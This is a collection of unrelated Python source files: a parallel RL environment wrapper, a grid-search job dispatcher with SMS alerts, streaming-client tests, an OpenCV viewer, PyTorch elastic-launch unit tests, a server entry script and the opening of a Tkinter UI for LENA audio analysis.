goal_x, goal_y = get_goal_loc(globs)
extra = (agent_x, agent_y, goal_type, goal_color, goal_x, goal_y)
else:
# sender's frame
reward = 0.0
done = False
active_sender = False
active_receiver = not active_sender
active = (active_sender, active_receiver)
acting = (False, active_receiver)
sending = (active_sender, False)
obss = prev_result[3]
extra = prev_result[4]
return active, acting, sending, obss, extra, reward, done
def worker(conn, env, n, conventional, archimedean, informed_sender):
while True:
cmd, action, prev_result = conn.recv()
if cmd == "step":
conn.send(step(env, n, conventional, archimedean, informed_sender, action, prev_result))
elif cmd == "reset":
conn.send(reset(env, n, conventional, archimedean, informed_sender))
else:
raise NotImplementedError
class ParallelEnv(gym.Env):
"""A concurrent execution of environments in multiple processes."""
def __init__(self, env, n, conventional, archimedean, informed_sender):
assert len(env) >= 1, "No environment given."
self.env = env
self.num_procs = len(env)
self.n = n
self.conventional = conventional
self.archimedean = archimedean
self.informed_sender = informed_sender
self.observation_space = self.env[0].observation_space
self.action_space = self.env[0].action_space
self.locals = []
self.processes = []
        for env in self.env[1:]:
local, remote = Pipe()
self.locals.append(local)
p = Process(target=worker, args=(remote, env, n, conventional, archimedean, informed_sender))
p.daemon = True
p.start()
remote.close()
self.processes.append(p)
def reset(self):
for local in self.locals:
local.send(("reset", None, None))
self.prev_results = [reset(self.env[0], self.n, self.conventional, self.archimedean, self.informed_sender)] + [local.recv() for local in self.locals]
return zip(*self.prev_results)
def step(self, actions):
for local, action, prev_result in zip(self.locals, actions[1:, 1], self.prev_results[1:]):
local.send(("step", action, prev_result))
self.prev_results = [step(self.env[0], self.n, self.conventional, self.archimedean, self.informed_sender, actions[0, 1], self.prev_results[0])] + [local.recv() for local in self.locals]
return zip(*self.prev_results)
def render(self):
raise NotImplementedError
def __del__(self):
for p in self.processes:
p.terminate()
|
dispatcher.py
|
import argparse
import subprocess
import os
import multiprocessing
import pickle
import csv
from twilio.rest import Client
import json
import sys
from os.path import dirname, realpath
sys.path.append(dirname(dirname(realpath(__file__))))
import rationale_net.utils.parsing as parsing
EXPERIMENT_CRASH_MSG = "ALERT! job:[{}] has crashed! Check logfile at:[{}]"
CONFIG_NOT_FOUND_MSG = "ALERT! {} config {} file does not exist!"
RESULTS_PATH_APPEAR_ERR = 'results_path should not appear in config. It will be determined automatically per job'
SUCCESSFUL_SEARCH_STR = "SUCCESS! Grid search results dumped to {}. Best dev loss: {}, dev accuracy: {:.3f}"
RESULT_KEY_STEMS = ['{}_loss', '{}_obj_loss', '{}_k_selection_loss',
'{}_k_continuity_loss','{}_accuracy']
LOG_KEYS = ['results_path', 'model_path', 'log_path']
SORT_KEY = 'dev_loss'
parser = argparse.ArgumentParser(description='OncoNet Grid Search Dispatcher. For use information, see `doc/README.md`')
parser.add_argument("--experiment_config_path", required=True, type=str, help="Path of experiment config")
parser.add_argument("--alert_config_path", type=str, default='configs/alert_config.json', help="Path of alert config")
parser.add_argument('--log_dir', type=str, default="logs", help="path to store logs and detailed job level result files")
parser.add_argument('--result_path', type=str, default="results/grid_search.csv", help="path to store grid_search table. This is preferably on shared storage")
parser.add_argument('--rerun_experiments', action='store_true', default=False, help='whether to rerun experiments with the same result file location')
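# Example invocation (config paths are illustrative):
#   python dispatcher.py --experiment_config_path configs/grid_search.json \
#       --result_path results/grid_search.csv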
def send_text_msg(msg, alert_config, twilio_config):
'''
Send a text message using twilio acct specified twilio conf to numbers
specified in alert_conf.
If suppress_alerts is turned on, do nothing
:msg: - body of text message
    :alert_config: - dictionary with a list of numbers to send the message to
:twilio-config: - dictionary with twilio SID, TOKEN, and phone number
'''
if alert_config['suppress_alerts']:
return
client = Client(twilio_config['ACCOUNT_SID'], twilio_config['AUTH_TOKEN'])
    for number in alert_config['alert_nums']:
client.messages.create(
to=number, from_=twilio_config['twilio_num'], body=msg)
def launch_experiment(gpu, flag_string, alert_conf, twilio_conf):
'''
Launch an experiment and direct logs and results to a unique filepath.
    Alert if something goes wrong.
:gpu: gpu to run this machine on.
:flag_string: flags to use for this model run. Will be fed into
scripts/main.py
'''
if not os.path.isdir(args.log_dir):
os.makedirs(args.log_dir)
log_name = parsing.md5(flag_string)
log_stem = os.path.join(args.log_dir, log_name)
log_path = '{}.txt'.format(log_stem)
results_path = "{}.results".format(log_stem)
experiment_string = "CUDA_VISIBLE_DEVICES={} python -u scripts/main.py {} --results_path {}".format(
gpu, flag_string, results_path)
# forward logs to logfile
shell_cmd = "{} > {} 2>&1".format(experiment_string, log_path)
print("Lauched exp: {}".format(shell_cmd))
if not os.path.exists(results_path) or args.rerun_experiments:
subprocess.call(shell_cmd, shell=True)
if not os.path.exists(results_path):
# running this process failed, alert me
job_fail_msg = EXPERIMENT_CRASH_MSG.format(experiment_string, log_path)
send_text_msg(job_fail_msg, alert_conf, twilio_conf)
return results_path, log_path
def worker(gpu, job_queue, done_queue, alert_config, twilio_config):
'''
Worker thread for each gpu. Consumes all jobs and pushes results to done_queue.
:gpu - gpu this worker can access.
:job_queue - queue of available jobs.
:done_queue - queue where to push results.
'''
while not job_queue.empty():
params = job_queue.get()
if params is None:
return
done_queue.put(
launch_experiment(gpu, params, alert_config, twilio_config))
if __name__ == "__main__":
args = parser.parse_args()
if not os.path.exists(args.experiment_config_path):
print(CONFIG_NOT_FOUND_MSG.format("experiment", args.experiment_config_path))
sys.exit(1)
experiment_config = json.load(open(args.experiment_config_path, 'r'))
if 'results_path' in experiment_config['search_space']:
        print(RESULTS_PATH_APPEAR_ERR)
sys.exit(1)
if not os.path.exists(args.alert_config_path):
print(CONFIG_NOT_FOUND_MSG.format("alert", args.alert_config_path))
sys.exit(1)
alert_config = json.load(open(args.alert_config_path, 'r'))
twilio_conf_path = alert_config['path_to_twilio_secret']
if not os.path.exists(twilio_conf_path):
print(CONFIG_NOT_FOUND_MSG.format("twilio", twilio_conf_path))
twilio_config = None
if not alert_config['suppress_alerts']:
twilio_config = json.load(open(twilio_conf_path, 'r'))
job_list, experiment_axies = parsing.parse_dispatcher_config(experiment_config)
job_queue = multiprocessing.Queue()
done_queue = multiprocessing.Queue()
for job in job_list:
job_queue.put(job)
print("Launching Dispatcher with {} jobs!".format(len(job_list)))
print()
for gpu in experiment_config['available_gpus']:
print("Start gpu worker {}".format(gpu))
multiprocessing.Process(target=worker, args=(gpu, job_queue, done_queue, alert_config, twilio_config)).start()
print()
summary = []
result_keys = []
for mode in ['train','dev','test']:
result_keys.extend( [k.format(mode) for k in RESULT_KEY_STEMS ])
for _ in range(len(job_list)):
result_path, log_path = done_queue.get()
assert result_path is not None
try:
result_dict = pickle.load(open(result_path, 'rb'))
except Exception as e:
print("Experiment failed! Logs are located at: {}".format(log_path))
continue
result_dict['log_path'] = log_path
# Get results from best epoch and move to top level of results dict
best_epoch_indx = result_dict['epoch_stats']['best_epoch']
present_result_keys = []
for k in result_keys:
if (k in result_dict['test_stats'] and len(result_dict['test_stats'][k])>0) or (k in result_dict['epoch_stats'] and len(result_dict['epoch_stats'][k])>0):
present_result_keys.append(k)
if 'test' in k:
result_dict[k] = result_dict['test_stats'][k][0]
else:
result_dict[k] = result_dict['epoch_stats'][k][best_epoch_indx]
summary_columns = experiment_axies + present_result_keys + LOG_KEYS
# Only export keys we want to see in sheet to csv
summary_dict = {}
for key in summary_columns:
summary_dict[key] = result_dict[key]
summary.append(summary_dict)
summary = sorted(summary, key=lambda k: k[SORT_KEY])
dump_result_string = SUCESSFUL_SEARCH_STR.format(
args.result_path, summary[0]['dev_loss'], summary[0]['dev_accuracy']
)
# Write summary to csv
with open(args.result_path, 'w') as out_file:
writer = csv.DictWriter(out_file, fieldnames=summary_columns)
writer.writeheader()
for experiment in summary:
writer.writerow(experiment)
print(dump_result_string)
send_text_msg(dump_result_string, alert_config, twilio_config)
|
stream.py
|
slait_server = "http://192.168.220.128:5994/"
# slait_server = "http://127.0.0.1:5994/"
def subscriber_test():
from os import sys, path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
import pyslait
sc = pyslait.StreamClient(slait_server)
@sc.onCtrl("lobs","BTC")
def on_ctrl(streamClient, msg):
print('Got[lobs/BTC] ctrl cmd:', msg)
@sc.onData("lobs","BTC")
def on_data(streamClient, msg):
print('Got BTC data:', msg)
@sc.onData("lobs","ETH")
def on_data(streamClient, msg):
print('Got ETH data:', msg)
sc.runsub("lobs",["BTC","ETH"])
def publisher_test():
from os import sys, path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
import pyslait
from datetime import datetime, timedelta
sc = pyslait.StreamClient(slait_server)
def dgen():
n = datetime.now()
l = list()
for i in range(1,5):
d = dict()
d['Data'] = str(i)
d['Timestamp'] = pyslait.client.datestring(n+timedelta(seconds=5*i))
l.append(d)
return l
@sc.onCtrl("lobs","BTC")
def on_ctrl(streamClient, msg):
if msg == pyslait.data.CtrlMessage.PUB_READY:
l = dgen()
sc.publish("lobs", "BTC", l)
print('Publish[lobs/BTC] :', l)
else:
print('Got[lobs/BTC] ctrl cmd:', msg)
sc.runpub("lobs","BTC")
def subpub_test():
from os import sys, path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
import threading
import time
s = threading.Thread(target=subscriber_test)
p = threading.Thread(target=publisher_test)
s.daemon = True
p.daemon = True
s.start()
print('Subscriber started...')
time.sleep(3)
p.start()
print('Publisher started...')
time.sleep(10)
if __name__ == '__main__' and not __package__:
# subscriber_test()
# publisher_test()
subpub_test()
|
random.py
|
import os
import cv2
import sys
import threading
thread_started = False
def thread():
global thread_started
print(thread_started)
# Making a new window and setting its properties
cv2.namedWindow('Image', cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty("Image", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
# Loading the image
currentDirectory = os.path.abspath(os.path.dirname(sys.argv[0]))
imagepath = os.path.join(currentDirectory, 'Images/DSC02055.JPG')
print(imagepath)
img = cv2.imread(imagepath, cv2.IMREAD_UNCHANGED)
# Showing the image
while True:
cv2.imshow('Image', img)
if cv2.waitKey(0) == ord('q'):
# Closing and exiting with "q"
break
# Closing all open OpenCV windows
cv2.destroyAllWindows()
thread_started = False
loops = 1
while True:
if not thread_started:
print('Starting Thread')
# use a different name so we don't shadow the thread() function on re-launch
display_thread = threading.Thread(target=thread)
thread_started = True
display_thread.start()
# End after 3 times
loops += 1
if loops > 3:
break
|
run_test.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import os
import runpy
import shutil
import subprocess
import sys
import tempfile
import unittest
import uuid
from contextlib import closing
from unittest import mock
from unittest.mock import Mock, patch
import torch.distributed.run as launch
from torch.distributed.elastic.agent.server.api import RunResult, WorkerState
from torch.distributed.elastic.multiprocessing.errors import ChildFailedError
from torch.distributed.elastic.rendezvous.etcd_server import EtcdServer
from torch.distributed.elastic.utils import get_socket_with_port
from torch.distributed.elastic.utils.distributed import get_free_port
from torch.testing._internal.common_utils import (
TEST_WITH_DEV_DBG_ASAN,
sandcastle_skip_if,
)
def launch_in_proc(args):
launch.main(args)
def path(script):
return os.path.join(os.path.dirname(__file__), script)
def get_child_pids(pid):
pgrep = subprocess.Popen(args=f"pgrep -P {pid}", shell=True, stdout=subprocess.PIPE)
pgrep.wait()
out = pgrep.stdout.read().decode("utf-8").rstrip().split("\n")
pids = []
for pid in out:
if pid:
pids.append(int(pid))
return pids
def pid_exists(pid):
try:
os.kill(pid, 0)
return True
except OSError:
return False
class MockException(Exception):
pass
class ElasticLaunchTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
# start a standalone, single process etcd server to use for all tests
cls._etcd_server = EtcdServer()
cls._etcd_server.start()
cls._etcd_endpoint = cls._etcd_server.get_endpoint()
@classmethod
def tearDownClass(cls):
# stop the standalone etcd server
cls._etcd_server.stop()
def setUp(self):
self.test_dir = tempfile.mkdtemp()
# remove any lingering environment variables
for env in os.environ.keys():
if env.startswith("PET_"):
del os.environ[env]
# set a sentinel env var on the parent proc
# this should be present on the child and gets
# asserted in ``bin/test_script.py``
os.environ["TEST_SENTINEL_PARENT"] = "FOOBAR"
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_launch_user_script_python(self):
self._test_launch_user_script_python()
def _test_launch_user_script_python(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_launch_user_script_python_caffe2_bc(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
sock = get_socket_with_port()
with closing(sock):
master_port = sock.getsockname()[1]
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=spawn",
"--master_addr=localhost",
f"--master_port={master_port}",
"--node_rank=0",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_user_script_bash(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
launch.main(args + ["--module"] + script_args)
launch.main(args + script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_user_script_default_nproc(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
world_size = 1
args = [
f"--nnodes={nnodes}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
launch.main(args + ["--module"] + script_args)
launch.main(args + script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_with_env_vars(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
os.environ["PET_NNODES"] = str(nnodes)
os.environ["PET_NPROC_PER_NODE"] = str(nproc_per_node)
os.environ["PET_RDZV_BACKEND"] = "etcd"
os.environ["PET_RDZV_ENDPOINT"] = self._etcd_endpoint
os.environ["PET_RDZV_ID"] = run_id
os.environ["PET_MONITOR_INTERVAL"] = "1"
os.environ["PET_START_METHOD"] = "spawn"
os.environ["PET_NO_PYTHON"] = "1"
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
os.environ["PET_MODULE"] = "1"
launch.main(script_args)
os.environ["PET_MODULE"] = "0"
launch.main(script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def _test_nproc_launch_configuration(self, nproc_type, expected_number):
run_id = str(uuid.uuid4().int)
nnodes = 1
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_type}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
launch.main(args + script_args)
world_size = nnodes * expected_number
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_nproc_launch_auto_configurations(self):
self._test_nproc_launch_configuration("auto", os.cpu_count())
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_nproc_launch_number_configurations(self):
self._test_nproc_launch_configuration("4", 4)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_nproc_launch_unknown_configurations(self):
with self.assertRaises(ValueError):
self._test_nproc_launch_configuration("unknown", 4)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
@patch("torch.cuda.is_available", return_value=True)
@patch("torch.cuda.device_count", return_value=3)
def test_nproc_gpu_launch_configurations(self, _mock1, _mock2):
self._test_nproc_launch_configuration("auto", 3)
self._test_nproc_launch_configuration("gpu", 3)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_elastic(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
# we are only launching 1 node (even though max = 2)
world_size = nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@mock.patch("torch.distributed.elastic.events.record")
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_elastic_worker_raise_exception(self, record_mock):
"""
Asserts that when the worker program fails, the launcher raises an exception
to indicate that the worker process failed
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=spawn",
path("bin/test_script.py"),
"--fail",
]
with self.assertRaises(ChildFailedError):
launch.main(args)
record_mock.assert_called_once()
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
@mock.patch(
"torch.distributed.elastic.agent.server.local_elastic_agent.LocalElasticAgent.run"
)
@mock.patch("torch.distributed.elastic.events.record")
def test_launch_elastic_agent_raise_exception(self, record_mock, mock_agent_run):
"""
Asserts that when the agent raises an exception
the launcher re-raises the original exception
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
mock_agent_run.side_effect = MockException
with self.assertRaises(MockException):
launch.main(args)
record_mock.assert_called_once()
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_standalone(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--standalone",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_run_path(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
"--run_path",
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_elastic_multiple_agents(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
nnodes = 2
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
procs = []
for _ in range(nnodes - 1):
p = mp.Process(target=launch.main, args=[args])
procs.append(p)
p.start()
launch.main(args)
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_min_max_nodes_parse(self):
min_nodes, max_nodes = launch.parse_min_max_nnodes("1")
self.assertEqual(min_nodes, max_nodes)
self.assertEqual(1, min_nodes)
min_nodes, max_nodes = launch.parse_min_max_nnodes("2:20")
self.assertEqual(2, min_nodes)
self.assertEqual(20, max_nodes)
with self.assertRaises(RuntimeError):
launch.parse_min_max_nnodes("2:20:30")
@patch("torch.distributed.launcher.api.LocalElasticAgent")
def test_launch_shutdown(self, agent_mock_cls):
nnodes = 1
nproc_per_node = 4
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
agent_mock = Mock()
agent_mock.run.return_value = RunResult(WorkerState.SUCCEEDED)
agent_mock_cls.return_value = agent_mock
rdzv_handler_mock = Mock()
with patch(
"torch.distributed.elastic.rendezvous.registry.get_rendezvous_handler"
) as param_mock:
param_mock.return_value = rdzv_handler_mock
launch.main(args)
rdzv_handler_mock.shutdown.assert_called_once()
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_is_torchelastic_launched(self):
# launch test script with torchelastic and validate that
# torch.distributed.is_torchelastic_launched() returns True
out_file = f"{os.path.join(self.test_dir, 'out')}"
launch.main(
[
"--run_path",
"--nnodes=1",
"--nproc_per_node=1",
"--monitor_interval=1",
path("bin/test_script_is_torchelastic_launched.py"),
f"--out_file={out_file}",
]
)
with open(out_file, "r") as fp:
is_torchelastic_launched = fp.readline()
self.assertEqual("True", is_torchelastic_launched)
def test_is_not_torchelastic_launched(self):
# launch test script without torchelastic and validate that
# torch.distributed.is_torchelastic_launched() returns False
out_file = f"{os.path.join(self.test_dir, 'out')}"
# need to run the script with runpy in the same interpreter
# as the test because otherwise (depending on the environment)
# it will not find torch as a dependency
with patch.object(
sys,
"argv",
[
path("bin/test_script_is_torchelastic_launched.py"),
f"--out_file={out_file}",
],
):
runpy.run_path(sys.argv[0], run_name="__main__")
with open(out_file, "r") as fp:
is_torchelastic_launched = fp.readline()
self.assertEqual("False", is_torchelastic_launched)
def test_init_method_tcp(self):
port = get_free_port()
with patch.object(
sys,
"argv",
[
path("bin/test_script_init_method.py"),
f"--init_method=tcp://localhost:{port}",
"--rank=0",
"--world_size=1",
],
):
runpy.run_path(sys.argv[0], run_name="__main__")
# nothing to validate, just make sure it runs
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_init_method_tcp_with_torchelastic(self):
port = get_free_port()
launch.main(
[
"--run_path",
"--nnodes=1",
"--nproc_per_node=4",
"--master_addr=localhost",
f"--master_port={port}",
"--monitor_interval=1",
path("bin/test_script_init_method.py"),
f"--init_method=tcp://localhost:{port}",
]
)
# nothing to validate, just make sure it runs
def test_init_method_env(self):
port = get_free_port()
with patch.dict(
os.environ,
{
"RANK": "0",
"WORLD_SIZE": "1",
"MASTER_ADDR": "localhost",
"MASTER_PORT": str(port),
},
), patch.object(
sys,
"argv",
[
path("bin/test_script_init_method.py"),
"--init_method=env://",
],
):
runpy.run_path(sys.argv[0], run_name="__main__")
# nothing to validate, just make sure it runs
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_init_method_env_with_torchelastic(self):
port = get_free_port()
launch.main(
[
"--run_path",
"--nnodes=1",
"--nproc_per_node=4",
"--master_addr=localhost",
f"--master_port={port}",
"--monitor_interval=1",
path("bin/test_script_init_method.py"),
"--init_method=env://",
]
)
# nothing to validate, just make sure it runs
def test_get_default_executable(self):
self.assertEqual(sys.executable, launch.get_executable())
|
main.py
|
from threading import Thread
from critical_watcher import criticalWatcher
from audio import updatePos
from connections import *
from user_functions import *
import console
import server
import variables
import sys
import traceback
console.initLogger()
# not-so-magic constants
server_port = int(sys.argv[1])
controller_server_port = int(sys.argv[2])
CLIENT_STATUS_UPDATER_INTERVAL = 1
log().info(f"Starting server on port {server_port}, {controller_server_port}")
# global variables initiation
variables._init()
variables.set("server_port", server_port)
variables.set("controller_server_port", controller_server_port)
variables.set("isplaying", 0)
variables.set("url", "None")
variables.set("songpos", "None")
variables.set("songlen", "None")
variables.set("stop", False)
variables.set("active_time", 5)
variables.set("last_controller_client", None)
# ok run it
thread_critical_watcher = Thread(target = criticalWatcher, name = "CriticalWatcherThread")
thread_player_timing = Thread(target = updatePos, name = "PlayerTimingThread")
thread_main_server = Thread(target = server.server, name = "MainServerThread", args = (server_port, ))
thread_controller_server = Thread(target = server.controller, name = "ControllerServerThread", args = (controller_server_port, ))
thread_client_status_updater = Thread(target = updateClientStatus, name = "ClientStatusUpdaterThread", args = (CLIENT_STATUS_UPDATER_INTERVAL, ))
thread_critical_watcher.daemon = True
try:
thread_critical_watcher.start()
thread_player_timing.start()
thread_main_server.start()
thread_controller_server.start()
thread_client_status_updater.start()
except Exception:
for i in traceback.format_exc().split("\n"):
console.log("error").error(i)
# command binding
# format: {command: target_function}
INPUT_BINDINGS = {"stop": stop,
"status": logStatus,
"list": listClients,
"ports": listPorts}
console.userInputMode(INPUT_BINDINGS)
|
LenaUI.py
|
"""
The MIT License (MIT)
Copyright (c) 2017 Paul Yoder, Joshua Wade, Kenneth Bailey, Mena Sargios, Joseph Hull, Loraina Lampley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import ttk, tkFileDialog
from Tkinter import *
from Batch import Batch
from SeqAnalysis2 import SeqAnalysis
import os
import platform
import threading
import time
import ast
import tkMessageBox
from Helpers import *
MAC = 'Darwin'
WINDOWS = 'Windows'
AB = 'A_B'
ABC = 'AB_C'
OK = 'ok'
MAXTHREADS = 4
codes = ('MAN','MAF','FAN','FAF','CHNSP','CHNNSP', \
'CHF','CXN','CXF','NON','NOF','OLN','OLF','TVN', \
'TVF','SIL')
codes_index = {'MAN':0,'MAF':1,'FAN':2,'FAF':3,'CHNSP':4,'CHNNSP':5, \
'CHF':6,'CXN':7,'CXF':8,'NON':9,'NOF':10,'OLN':11,'OLF':12,'TVN':13, \
'TVF':14,'SIL':15}
class LenaUI:
"This class is the UI and associated actions"
def __init__(self, root):
"UI started on init of class"
self.root = root
root.resizable(False, False)
root.title("LENA Contingencies")
# Class Attributes
self.its_file_dict = {} # k:ID v:path/to/file
self.input_dir = StringVar()
self.output_dir = StringVar()
self.output_format = []
self.seq_config = {}
self.pause_duration = DoubleVar()
self.pause_duration.set(0.1)
self.rounding_enabled = BooleanVar()
self.sequence_type = StringVar()
self.var_a = []
self.var_b = []
self.var_c = []
self.output_format.append(".csv") # set to csv default
self.output_msg = ""
self.output_msg_counter = 0
